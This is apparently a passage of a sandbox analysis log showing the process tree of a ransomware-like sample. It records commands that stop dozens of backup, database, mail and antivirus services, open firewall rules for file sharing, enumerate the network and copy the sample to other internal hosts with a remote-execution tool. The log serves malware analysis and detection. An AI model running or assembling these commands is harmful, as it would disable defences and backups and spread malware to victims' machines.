    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:6204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:7124
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:7048
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:6348
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:3908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:4804
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:5384
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetMsmqActivator /y
      4⤵
      PID:4600
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:6868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:1532
- - C:\Windows\system32\net.exe
    "net.exe" stop “Enterprise Client Service” /y
    3⤵
    PID:1624
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:6324
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:6772
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4572
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:6148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:4856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:2384
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:4568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:6048
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:3956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:4604
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:5808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:4652
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:5608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:1684
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop swi_service /y
        5⤵
        
        PID:3044
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:6176
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:6132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:540
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:4660
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:5852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:2604
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:6472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:1328
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:4144
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:3912
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:4788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CASAD2DWebSvc /y
      4⤵
      PID:5504
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:3164
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:4128
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:1692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:2704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:4240
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:3736
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:6044
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:4292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:5456
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:4168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:5104
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:4956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:7016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:6628
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4540
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:4476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:6944
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:6552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:5604
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:4608
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:5372
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:4764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:7064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5160
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:6716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:2332
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:6396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:5412
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:6120
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:6704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5952
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:6428
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:6664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:1680
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:6824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:5640
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:7120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:3672
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:6988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:5616
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:4948
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:5064
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:7036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:6452
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:4172
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:6172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:5208
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:6516
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:6064
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:1036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:256
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:5712
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:3300
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:6320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:5484
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:5212
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:6156
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:6772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:7116
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:5520
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:2692
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:5972
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:4772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:6632
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:4920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:5668
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:5324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:4420
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:5776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:7112
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5764
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:5832
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:5904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:3200
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:5744
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:4328
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:3196
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:4436
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:1264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:5348
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:1684
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:4200
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:4680
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:4316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:1424
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2504
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:4912
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:4872
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:5624
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:6488
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:4256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:4116
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5096
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:6968
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:5220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Health Service” /y
      4⤵
      PID:6800
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:5708
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:4808
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:6476
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:6840
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:4840
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:3740
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:4784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:836
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:6528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:5736
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:5316
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:2544
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:6744
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:6428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:2632
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:6680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:5848
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:6508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:2248
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5036
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:4456
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:4884
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:6728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:5464
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:276
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:5052
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:5420
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:5468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:5760
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:6668
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:6776
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:6916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:5428
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:5680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:2004
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:6080
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:6212
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:4416
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:6448
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:4820
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:4972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:5080
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:6868
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:4572
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:5672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:5724
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:4748
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:1044
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:3816
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:5060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:7100
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5440
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:7156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:6364
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:2352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:4776
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.33 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:2956
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:4396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:4292
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:6320
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:5016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:4772
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:7120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:5212
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:4440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:6644
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:3912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:5508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:5264
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:2680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5900
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:284
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:6128
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:1020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:4136
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:1296
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:6684
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:6832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:7076
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:4716
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.14 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:6264
